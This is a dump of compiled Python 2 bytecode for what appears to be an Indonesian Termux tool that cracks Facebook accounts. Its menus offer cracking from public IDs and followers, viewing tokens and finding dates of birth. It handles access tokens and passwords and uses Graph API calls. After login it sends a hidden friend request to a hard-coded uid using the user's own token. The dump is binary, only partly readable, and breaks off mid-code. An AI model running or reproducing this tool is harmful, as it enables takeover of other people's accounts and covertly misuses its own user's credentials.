\x00d+\x00\x84\x00\x00Z!\x00d,\x00\x84\x00\x00Z"\x00d-\x00\x84\x00\x00Z#\x00d.\x00\x84\x00\x00Z$\x00d/\x00\x84\x00\x00Z%\x00d0\x00\x84\x00\x00Z&\x00d1\x00\x84\x00\x00Z\'\x00d2\x00\x84\x00\x00Z(\x00d3\x00\x84\x00\x00Z)\x00d4\x00\x84\x00\x00Z*\x00d5\x00\x84\x00\x00Z+\x00d6\x00\x84\x00\x00Z,\x00d7\x00\x84\x00\x00Z-\x00d8\x00\x84\x00\x00Z.\x00d9\x00\x84\x00\x00Z/\x00e0\x00d:\x00k\x02\x00rl\x03e!\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(;\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPools\x15\x00\x00\x00pip2 install requestss\x0f\x00\x00\x00python2 Best.pyt\x05\x00\x00\x00clears(\x00\x00\x00/data/data/com.termux/files/usr/bin/nodes#\x00\x00\x00apt update && apt install nodejs -ys(\x00\x00\x00/data/data/com.termux/files/usr/bin/rubys)\x00\x00\x00apt install ruby -y && gem install lolcat(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionErrors\x08\x00\x00\x00git pullsG\x00\x00\x00/data/data/com.termux/files/home/hpro/...../node_modules/bytes/index.jss\x13\x00\x00\x00fuser -k 5000/tcp &t\x01\x00\x00\x00#s\x17\x00\x00\x00cd ..... && npm installs\x1b\x00\x00\x00cd ..... 
&& node index.js &s6\x00\x00\x00\x1b[1;32mPlease Select Chrome Browser To Continue\x1b[0;97ms\t\x00\x00\x00xdg-open i\n\x00\x00\x00s@\x00\x00\x00xdg-open https://www.facebook.com/profile.php?id=100000395779504g\x00\x00\x00\x00\xd0\x12sAg\x00\x00\x00\x008\x9c|Ag\x00\x00\x00\x00\x00\x88\xd3@g\x00\x00\x00\x00\x00\x88\xe3@s\x19\x00\x00\x00x-fb-connection-bandwidths\x0c\x00\x00\x00x-fb-sim-hnis\x0c\x00\x00\x00x-fb-net-hnit\t\x00\x00\x00EXCELLENTs\x17\x00\x00\x00x-fb-connection-qualitys!\x00\x00\x00cell.CTRadioAccessTechnologyHSDPAs\x14\x00\x00\x00x-fb-connection-types\xbe\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\n\x00\x00\x00user-agents!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-typet\x05\x00\x00\x00Ligers\x10\x00\x00\x00x-fb-http-engines\x05\x00\x00\x00utf-8s\x07\x00\x00\x00\x1b[1;32ms\x07\x00\x00\x00\x1b[0;97ms\x07\x00\x00\x00\x1b[1;31mc\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x11\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\xda\x03\x00\x00echo -e "\n\n\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91 \xe2\x97\x8d\xe2\x9e\xa4 ADMIN \xe2\x84\xa2\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97 \xe2\x97\x8d\xe2\x9e\xa4 COMUNITAS\n\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x9d\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 GARANGAN\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 ALAY\n\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x96\x88\xe2\x96\x88\xe2\x95\x97\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x95\x91 \xe2\x97\x8d\xe2\x9e\xa4 
INDONESIA\n\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x96\x91\xe2\x96\x91\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d \xe2\x97\x8d\xe2\x9e\xa4 C.G.A.I\n\n===============================================\n\n\xe2\x97\x8d\xe2\x9e\xa4 Codded By : \xe2\x98\x86 RAKA \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4\n\xe2\x97\x8d\xe2\x9e\xa4 Facebook : Raka Andrian Tara\n\xe2\x97\x8d\xe2\x9e\xa4 Instagram : raka_andrian27\n\xe2\x97\x8d\xe2\x9e\xa4 Youtube : YouTube Channel Bangsat-XD\n\n===============================================" | lolcat(\x02\x00\x00\x00t\x02\x00\x00\x00ost\x06\x00\x00\x00system(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x04\x00\x00\x00logo5\x00\x00\x00s\x02\x00\x00\x00\x00\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s=\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHd\x04\x00GHd\x05\x00GHd\x02\x00GHt\x03\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00NR\x01\x00\x00\x00t\x00\x00\x00\x00s$\x00\x00\x00\t \x1b[1;34mClone Method Menu\x1b[0;97ms\x17\x00\x00\x00\x1b[1;96m[1] B-api (Fast)s\x14\x00\x00\x00\x1b[1;96m[2] Localhost(\x04\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x12\x00\x00\x00method_menu_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x0b\x00\x00\x00method_menu7\x00\x00\x00s\x12\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sR\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r"\x00t\x01\x00\x83\x00\x00\x01n,\x00|\x00\x00d\x03\x00k\x02\x00r8\x00t\x02\x00\x83\x00\x00\x01n\x16\x00d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x03\x00\x83\x00\x00\x01d\x00\x00S(\x06\x00\x00\x00Ns\x13\x00\x00\x00 Choose method >>> t\x01\x00\x00\x001t\x01\x00\x00\x002R\t\x00\x00\x00s\'\x00\x00\x00\t \x1b[1;35mSelect valid option \x1b[0;97m(\x04\x00\x00\x00t\t\x00\x00\x00raw_inputt\x06\x00\x00\x00b_menut\x06\x00\x00\x00l_menuR\n\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00afza(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\n\x00\x00\x00A\x00\x00\x00s\x12\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sI\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00t\x03\x00\x17d\x04\x00\x17t\x04\x00\x17GHd\x02\x00GHd\x05\x00GHd\x06\x00GHd\x02\x00GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x07\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\r\x00\x00\x00FB Login MenusH\x00\x00\x00\x1b[1;92m[1] \xe2\x98\x86 ENTER TOKEN \xe2\x98\x86 \xe2\x84\xa2\xef\xb8\xbb\xc2\xae\xe2\x95\xa4\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\x90\xe2\x97\x8d\xe2\x9e\xa4s\x18\x00\x00\x00\x1b[1;92m[2] ID/Pass 
login(\x06\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x01\x00\x00\x00ct\x02\x00\x00\x00c2t\x0c\x00\x00\x00login_select(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x05\x00\x00\x00loginL\x00\x00\x00s\x12\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x11\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00sR\x01\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\x16\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHd\x05\x00GHd\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x01\x00t\x04\x00d\x07\x00d\x08\x00\x83\x02\x00}\x02\x00|\x02\x00j\x05\x00|\x01\x00\x83\x01\x00\x01|\x02\x00j\x06\x00\x83\x00\x00\x01yl\x00t\x07\x00j\x08\x00d\t\x00|\x01\x00\x17\x83\x01\x00}\x03\x00t\t\x00j\n\x00|\x03\x00j\x0b\x00\x83\x01\x00}\x04\x00|\x04\x00d\n\x00\x19}\x05\x00|\x05\x00j\x0c\x00d\x0b\x00\x83\x01\x00d\x0c\x00\x19}\x06\x00d\x04\x00GHd\r\x00|\x06\x00\x17d\x0e\x00\x17GHt\r\x00j\x0e\x00d\x0f\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01WqN\x01\x04t\x10\x00t\x11\x00f\x02\x00k\n\x00r\x12\x01\x01\x01\x01d\x04\x00GHd\x10\x00GHd\x04\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01qN\x01Xn8\x00|\x00\x00d\x12\x00k\x02\x00r,\x01t\x13\x00\x83\x00\x00\x01n"\x00d\x04\x00GHd\x13\x00t\x14\x00\x17d\x14\x00\x17t\x15\x00\x17GHd\x04\x00GHt\x16\x00\x83\x00\x00\x01d\x00\x00S(\x15\x00\x00\x00Ns\x19\x00\x00\x00 Choose login method >>> R\x0c\x00\x00\x00R\x01\x00\x00\x00R\t\x00\x00\x00s!\x00\x00\x00\t \x1b[1;32mFB Token Login\x1b[0;97ms\x19\x00\x00\x00\x1b[1;95mPast token here : s\r\x00\x00\x00.fb_token.txtt\x01\x00\x00\x00ws+\x00\x00\x00https://graph.facebook.com/me?access_token=t\x04\x00\x00\x00namet\x01\x00\x00\x00 i\x00\x00\x00\x00s\x1d\x00\x00\x00\t\x1b[1;32mToken logged in as : s\x07\x00\x00\x00\x1b[0;97mi\x03\x00\x00\x00s"\x00\x00\x00\t \x1b[1;31mToken not valid\x1b[0;97ms \x00\x00\x00\x1b[1;92mPress enter to try again R\r\x00\x00\x00s\x05\x00\x00\x00\t s\x13\x00\x00\x00Select valid 
method(\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00t\x04\x00\x00\x00opent\x05\x00\x00\x00writet\x05\x00\x00\x00closet\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textt\x06\x00\x00\x00rsplitt\x04\x00\x00\x00timet\x05\x00\x00\x00sleepR\x0b\x00\x00\x00t\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrorR\x15\x00\x00\x00t\x08\x00\x00\x00login_fbR\x12\x00\x00\x00R\x13\x00\x00\x00R\x14\x00\x00\x00(\x07\x00\x00\x00R\x11\x00\x00\x00t\x05\x00\x00\x00tokent\x07\x00\x00\x00token_st\x01\x00\x00\x00rt\x01\x00\x00\x00qR\x17\x00\x00\x00t\x02\x00\x00\x00nm(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x14\x00\x00\x00V\x00\x00\x00s@\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0f\x01\r\x01\n\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\x05\x01\r\x01\r\x01\x0b\x01\x13\x01\x05\x01\x05\x01\x05\x01\n\x01\x0e\x01\x0c\x01\n\x02\x05\x01\x11\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00sw\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x02\x00GHd\x03\x00GHd\x02\x00GHt\x03\x00d\x04\x00\x83\x01\x00}\x00\x00|\x00\x00j\x04\x00d\x05\x00d\x02\x00\x83\x02\x00}\x01\x00|\x01\x00j\x04\x00d\x06\x00d\x02\x00\x83\x02\x00}\x02\x00|\x02\x00j\x04\x00d\x07\x00d\x02\x00\x83\x02\x00}\x03\x00t\x03\x00d\x08\x00\x83\x01\x00}\x04\x00d\x02\x00GHt\x05\x00j\x06\x00d\t\x00|\x03\x00\x17d\n\x00\x17|\x04\x00\x17d\x0b\x00t\x07\x00\x83\x01\x01j\x08\x00}\x05\x00t\t\x00j\n\x00|\x05\x00\x83\x01\x00}\x06\x00d\x0c\x00|\x06\x00k\x06\x00r\x1d\x01t\x0b\x00d\r\x00d\x0e\x00\x83\x02\x00}\x07\x00|\x07\x00j\x0c\x00|\x06\x00d\x0c\x00\x19\x83\x01\x00\x01|\x07\x00j\r\x00\x83\x00\x00\x01t\x05\x00j\x0e\x00d\x0f\x00|\x06\x00d\x0c\x00\x19\x17\x83\x01\x00\x01t\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01d\x11\x00GHt\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01t\x11\x00\x83\x00\x00\x01nV\x00d\x12\x00|\x06\x00d\x13\x00\x19k\x06\x00rX\x01d\x14\x00GHd\x02\x00GHt\x0f\x00j\x10\x00d\x10\x00\x83\x01\x00\x01t\x03\x00d\x15\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x1b\x00d\x16\x00GHd\x02\x00GHt\x03\x00d\x15\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01d\x00\x00S(\x17\x00\x00\x00NR\x01\x00\x00\x00R\t\x00\x00\x00s#\x00\x00\x00\t \x1b[1;32mFB ID/PASS Login\x1b[0;97ms\x0f\x00\x00\x00 ID/Mail/Num : R\x18\x00\x00\x00t\x01\x00\x00\x00(t\x01\x00\x00\x00)s\x0e\x00\x00\x00 Password : s\x1e\x00\x00\x00http://localhost:5000/auth?id=s\x06\x00\x00\x00&pass=t\x07\x00\x00\x00headerst\x03\x00\x00\x00locs\r\x00\x00\x00.fb_token.txtR\x16\x00\x00\x00sG\x00\x00\x00https://graph.facebook.com/me/friends?uid=100000395779504&access_token=i\x01\x00\x00\x00s)\x00\x00\x00\t \x1b[1;31mLogged in successfully\x1b[0;97ms\x10\x00\x00\x00www.facebook.comt\x05\x00\x00\x00errors8\x00\x00\x00\t \x1b[1;31mUser must verify account before login\x1b[0;97ms \x00\x00\x00\x1b[1;93mPress enter to try again s.\x00\x00\x00\t\x1b[1;31mID/Number/Password may be wrong\x1b[0;97m(\x13\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x0e\x00\x00\x00t\x07\x00\x00\x00replaceR\x1c\x00\x00\x00R\x1d\x00\x00\x00t\x06\x00\x00\x00headerR 
\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R\x19\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x04\x00\x00\x00postR"\x00\x00\x00R#\x00\x00\x00R\x0b\x00\x00\x00R&\x00\x00\x00(\x08\x00\x00\x00t\x02\x00\x00\x00idt\x03\x00\x00\x00id1t\x03\x00\x00\x00id2t\x03\x00\x00\x00uidt\x03\x00\x00\x00pwdt\x04\x00\x00\x00dataR*\x00\x00\x00t\x05\x00\x00\x00hamza(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R&\x00\x00\x00x\x00\x00\x00s@\x00\x00\x00\x00\x01\r\x01\x07\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x12\x01\x12\x01\x12\x01\x0c\x01\x05\x01$\x01\x0f\x01\x0c\x01\x0f\x01\x11\x01\n\x01\x15\x01\r\x01\x05\x01\r\x01\n\x01\x10\x01\x05\x01\x05\x01\r\x01\n\x01\n\x02\x05\x01\x05\x01\n\x01c\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xad\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01y\x19\x00t\x03\x00d\x02\x00d\x03\x00\x83\x02\x00j\x04\x00\x83\x00\x00a\x05\x00Wn\x1e\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00rM\x00\x01\x01\x01t\x08\x00\x83\x00\x00\x01n\x01\x00XyL\x00t\t\x00j\n\x00d\x04\x00t\x05\x00\x17\x83\x01\x00}\x00\x00t\x0b\x00j\x0c\x00|\x00\x00j\r\x00\x83\x01\x00}\x01\x00|\x01\x00d\x05\x00\x19}\x02\x00|\x02\x00j\x0e\x00d\x06\x00\x83\x01\x00d\x07\x00\x19}\x03\x00|\x03\x00}\x04\x00Wn\x9d\x00\x04t\x06\x00t\x07\x00f\x02\x00k\n\x00r\xef\x00\x01\x01\x01d\x08\x00GHd\t\x00t\x0f\x00\x17d\n\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x0b\x00\x83\x01\x00\x01t\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01nK\x00\x04t\t\x00j\x13\x00j\x14\x00k\n\x00r9\x01\x01\x01\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\r\x00GHd\x08\x00GHt\x11\x00j\x12\x00d\x0c\x00\x83\x01\x00\x01t\x15\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x08\x00GHd\x0f\x00t\x0f\x00\x17d\x10\x00\x17|\x04\x00\x17t\x10\x00\x17GHd\x08\x00GHt\x00\x00j\x01\x00d\x11\x00\x83\x01\x00\x01d\x08\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHd\x16\x00GHd\x17\x00GHd\x08\x00GHt\x17\x00\x83\x00\x00\x01d\x00\x00S(\x18\x00\x00\x00NR\x01\x00\x00\x00s\r\x00\x00\x00.fb_token.txtR)\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R\x17\x00\x00\x00R\x18\x00\x00\x00i\x00\x00\x00\x00R\t\x00\x00\x00s\x05\x00\x00\x00\t s\x11\x00\x00\x00ID has checkpoints\x14\x00\x00\x00rm -rf .fb_token.txti\x01\x00\x00\x00s;\x00\x00\x00\t \x1b[1;31m\xe2\x9d\xa4\xef\xb8\x8fTurn on mobile data OR wifi\xe2\x9d\xa4\xef\xb8\x8f \x1b[0;97ms\'\x00\x00\x00\x1b[1;93mPress enter to try again \x1b[0;97ms\x03\x00\x00\x00\t s\x0e\x00\x00\x00Logged In UsersA\x00\x00\x00echo -e "-----------------------------------------------"| lolcats\x1f\x00\x00\x00\x1b[1;93m[1] Crack from public ids\x1f\x00\x00\x00\x1b[1;93m[2] Crack from followerss\x15\x00\x00\x00\x1b[1;93m[3] View tokens\x1d\x00\x00\x00\x1b[1;93m[4] Find date of births\x1d\x00\x00\x00\x1b[1;93m[5] Return method menus\x11\x00\x00\x00\x1b[1;93m[6] Logout(\x18\x00\x00\x00R\x06\x00\x00\x00R\x07\x00\x00\x00R\x08\x00\x00\x00R\x19\x00\x00\x00t\x04\x00\x00\x00readR\'\x00\x00\x00R$\x00\x00\x00R%\x00\x00\x00R\x15\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00R 
\x00\x00\x00R!\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R"\x00\x00\x00R#\x00\x00\x00t\n\x00\x00\x00exceptionsR\x02\x00\x00\x00R\x0e\x00\x00\x00R\x0f\x00\x00\x00t\r\x00\x00\x00b_menu_select(\x05\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00t\x03\x00\x00\x00nmft\x02\x00\x00\x00ok(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>R\x0f\x00\x00\x00\x9a\x00\x00\x00sT\x00\x00\x00\x00\x02\r\x01\x07\x01\x03\x01\x19\x01\x13\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x13\x01\n\x01\x13\x01\x05\x01\x11\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x07\x01\x05\x01\x05\x01\x05\x01\r\x01\n\x01\x0b\x01\r\x01\x07\x01\x05\x01\x15\x01\x05\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0c\x00\x00\x00\x06\x00\x00\x00\x03\x00\x00\x00s\x9d\x04\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00g\x00\x00}\x01\x00g\x00\x00\x89\x01\x00g\x00\x00\x89\x00\x00|\x00\x00d\x02\x00k\x02\x00r\xb0\x01t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x06\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyi\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x05\x00\x83\x01\x00\x01d\x04\x00GHd\n\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r.\x01\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x0e\x00\x17t\x06\x00\x17\x83\x01\x00}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00xm\x02|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01qg\x01Wn\x1c\x02|\x00\x00d\x14\x00k\x02\x00rR\x03t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x15\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00d\x16\x00\x83\x01\x00}\x02\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x07\x00\x83\x01\x00\x01d\x04\x00GHyo\x00t\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\t\x00\x17t\x06\x00\x17d\x17\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x04\x00t\x01\x00j\x02\x00d\x03\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01d\x04\x00GHt\x01\x00j\x02\x00d\x15\x00\x83\x01\x00\x01d\x04\x00GHd\x18\x00|\x04\x00d\x0b\x00\x19\x17GHWn7\x00\x04t\n\x00t\x0b\x00f\x02\x00k\n\x00r\xc6\x02\x01\x01\x01d\x04\x00GHd\x0c\x00GHd\x04\x00GHt\x00\x00d\r\x00\x83\x01\x00\x01t\x0c\x00\x83\x00\x00\x01n\x01\x00Xt\x04\x00j\x05\x00d\x08\x00|\x02\x00\x17d\x19\x00\x17t\x06\x00\x17d\x1a\x00\x17d\x17\x00t\x0f\x00\x83\x01\x01}\x03\x00t\x07\x00j\x08\x00|\x03\x00j\t\x00\x83\x01\x00}\x05\x00x\xcb\x00|\x05\x00d\x0f\x00\x19D]B\x00}\x06\x00|\x06\x00d\x10\x00\x19}\x07\x00|\x06\x00d\x0b\x00\x19}\x08\x00|\x08\x00j\r\x00d\x11\x00\x83\x01\x00d\x12\x00\x19}\t\x00|\x01\x00j\x0e\x00|\x07\x00d\x13\x00\x17|\t\x00\x17\x83\x01\x00\x01q\t\x03Wnz\x00|\x00\x00d\x1b\x00k\x02\x00rh\x03t\x10\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x1c\x00k\x02\x00r~\x03t\x11\x00\x83\x00\x00\x01nN\x00|\x00\x00d\x1d\x00k\x02\x00r\x94\x03t\x12\x00\x83\x00\x00\x01n8\x0
